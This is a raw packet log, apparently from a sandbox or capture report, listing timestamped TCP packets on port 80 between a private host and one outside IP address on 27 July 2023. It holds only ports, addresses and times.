Jul 27, 2023 20:19:08.634130001 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634146929 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634155035 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634171963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634183884 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634195089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634217024 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634221077 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634238958 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634246111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634262085 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634283066 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634303093 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634306908 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634306908 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634324074 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634346008 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634354115 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634366989 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634377003 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634390116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634411097 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634430885 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634449959 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634452105 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634474039 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634483099 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634496927 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634505987 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634517908 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634540081 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634552002 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634562969 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634567976 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634584904 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634593964 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634608984 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634622097 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634630919 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634648085 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634654999 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634663105 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634680986 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634690046 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634705067 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634713888 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634728909 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634744883 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634751081 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634773016 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634776115 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634795904 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634799957 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634819031 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634823084 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634840965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634852886 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634864092 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634867907 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634886980 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634895086 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634910107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634931087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634938002 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634938002 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634953976 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634967089 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.634977102 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.634998083 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635004044 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635019064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635035038 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635041952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635063887 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635066986 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635086060 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635090113 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635107994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635114908 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635132074 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635143995 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635154963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635176897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635179996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635201931 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635202885 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635225058 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635231018 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635246992 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635253906 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635271072 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635279894 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635294914 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635315895 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635324001 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635339022 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635343075 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635361910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635371923 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635385990 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635389090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635407925 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635415077 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635432959 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635436058 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635454893 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635468960 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635478973 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635485888 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635502100 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635510921 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635525942 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635540962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635548115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635571003 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635574102 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635593891 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635601044 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635616064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635622978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635639906 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635641098 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635663033 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635669947 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635685921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635695934 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635709047 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635715008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635732889 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635746002 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635756016 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635777950 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635791063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635792017 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635799885 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635811090 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635824919 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635826111 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635845900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635867119 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635867119 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635889053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635890961 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635910034 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635917902 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635934114 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635953903 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.635955095 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635982037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.635983944 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636003971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636006117 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636027098 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636030912 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636049032 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636064053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636077881 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636090994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636111021 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636116982 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636132956 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636137009 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636154890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636176109 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636183023 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636198044 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636209011 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636219978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636219978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636236906 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636241913 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636259079 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636275053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636285067 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636298895 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636321068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636339903 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636342049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636363983 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636365891 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636384964 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636399031 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636406898 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636428118 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636429071 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636447906 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636461973 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636470079 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636492014 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636495113 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636512041 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636523962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636533022 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636542082 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636554956 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636564970 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636576891 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636584997 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636599064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636605024 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636620998 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636621952 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636642933 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636642933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636662006 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636663914 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636682034 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636686087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636702061 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636708975 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636720896 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636729002 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636739969 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636750937 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636764050 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636773109 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636795044 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636797905 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636815071 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636831999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636837006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636858940 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636859894 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636881113 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636892080 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636900902 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636919975 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636921883 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636943102 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636946917 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636964083 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636966944 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.636986017 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.636986971 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.637007952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.637007952 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.637027025 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.637028933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.637048006 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.637049913 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.637068987 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.637073040 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.637089014 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.637106895 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.901843071 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.901876926 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.901902914 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.901933908 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.901954889 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.901976109 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.901997089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902010918 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902023077 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902045965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902055979 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902069092 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902090073 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902106047 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902112007 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902128935 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902134895 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902156115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902177095 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902199030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902221918 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902242899 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902266026 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902286053 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902297020 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902307034 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902313948 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902331114 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902354002 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902375937 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902391911 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902405977 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902420044 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902434111 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902456045 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902471066 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902477980 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902503014 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902525902 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902548075 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902564049 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902570009 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902591944 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902612925 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902614117 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902636051 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902641058 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902657032 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902657986 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902678967 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902681112 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902703047 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902708054 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902724028 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902739048 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902746916 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902770042 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902770996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902791977 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902812004 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902817965 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902836084 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902857065 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902868032 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902878046 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902899027 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902920008 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902920961 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902935982 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902942896 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902960062 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.902964115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902985096 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.902998924 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.903006077 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.903019905 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.903027058 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.903048038 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.903053045 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.903069019 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:08.903090954 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:08.903140068 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.167711020 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.167767048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.167812109 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.167853117 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.167870045 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:09.167896032 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:09.167931080 CEST	49698	80	192.168.2.4	103.100.211.218
